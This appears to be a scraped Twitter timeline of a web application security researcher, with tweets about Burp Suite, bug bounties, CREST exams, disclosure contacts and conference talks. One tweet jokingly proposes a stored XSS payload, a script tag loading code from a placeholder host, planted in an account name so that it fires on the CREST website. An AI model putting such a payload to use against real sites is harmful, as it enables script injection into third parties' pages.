Soroush Dalili  

@irsdl

appsec \ web / | please see my blog for other works | a delimiter character fan |,:;$& RT/LK can be accidental or !

UK
Joined August 2009

Tweets

You blocked @irsdl

Are you sure you want to view these Tweets? Viewing Tweets won't unblock @irsdl

  1. Pinned Tweet
    May 11

    Self promotion time - if you are testing a payment system or a shop, check the whitepaper that I had written and updated last year: 💰💰💰

    Show this thread
    Undo
  2. 2 hours ago

    Does Burp Suite have a real competitor at the moment? Can you sec test web apps as good without it? reply in comments if you think differently!

    Undo
  3. 15 hours ago

    so many domains, just a little time and money...

    Show this thread
    Undo
  4. 15 hours ago

    I couldn't help myself with this:

    Show this thread
    Undo
  5. 15 hours ago

    Lol another free collab server!

    Show this thread
    Undo
  6. 20 hours ago

    We need one of these casts for data breaches! Say no to password change, say no to two factor authentications, say no to strong password, say no to data leaks... You cannot force us not to use Password1! we cast you out!

    Undo
  7. 22 hours ago

    I also think what if we create an account with script tag in the name to XSS CREST website when they mention them: <script src=//examp.le/>CRESTApproved</scirpt>

    Show this thread
    Undo
  8. 22 hours ago

    I hope the positive outcome of this is for CREST to update at least their old questions so we will not fail because we didn't know how Solaris 8 was doing something or what a CVE from more than 10 years ago was for ;)

    Show this thread
    Undo
  9. Aug 10

    The director's cut recording of 's Web Cache Entanglement: Novel Pathways to Poisoning is now available! Watch it here:

    Undo
  10. Aug 10

    What helped me a lot was the hack in auto-renewal of the wildcard cert using letsencrypt

    Show this thread
    Undo
  11. Aug 10

    WooHoo installing burp collab server was extremely easy with this highly recommended!

    Show this thread
    Undo
  12. Aug 8

    Lockdown resulted in a surge of vulnerability reports, says Microsoft in its annual bug bounty review

    Undo
  13. Aug 5

    This is too good. YouTuber walks around Shibuya like it’s a video game.

    Show this thread
    Undo
  14. Aug 7

    An interesting theme in new talks is that Rick has replaced Mallory!

    Undo
  15. Aug 6

    Hey , apparently Biden can hurt you, stay safe! After all, it is 2020 and anything is possible

    Undo
  16. Aug 5

    Cool XXE to RCE vulnerability from the 2020 ICS

    Undo
  17. Aug 6

    I only post when resource is so good, and and put on an amazing training! If you want to further your web app skills or bug bounty skills, definitely take "A look beyond the WAHH course" when you get a chance the new labs are extremely fun and challenging!

    Undo
  18. Aug 6

    I wrote this in the Alt section of the image but realised it is not visible: I have used “vulnerability/bug hunters” rather than “security researchers” as it is a better fit!

    Show this thread
    Undo
  19. Aug 4
    Replying to

    1. check their website, security.txt and for policy and contact. 2. if none, google for history of being nasty with researchers. if true, go to local cert instead. 3. check linkedin for security contacts or ping someone in the security OG for a connect

    Undo
  20. Aug 5

    How can we get our freebies in the virtual now? 😭 asking for a friend! If you also want to attend virtually:

    Undo
  21. Aug 5
    MSRC’s 2020 Most Valuable `Security Researchers` (but better to say, Vulnerability Hunters)
    Show this thread
    Undo

Loading seems to be taking a while.

Twitter may be over capacity or experiencing a momentary hiccup. Try again or visit Twitter Status for more information.

    You may also like

    ·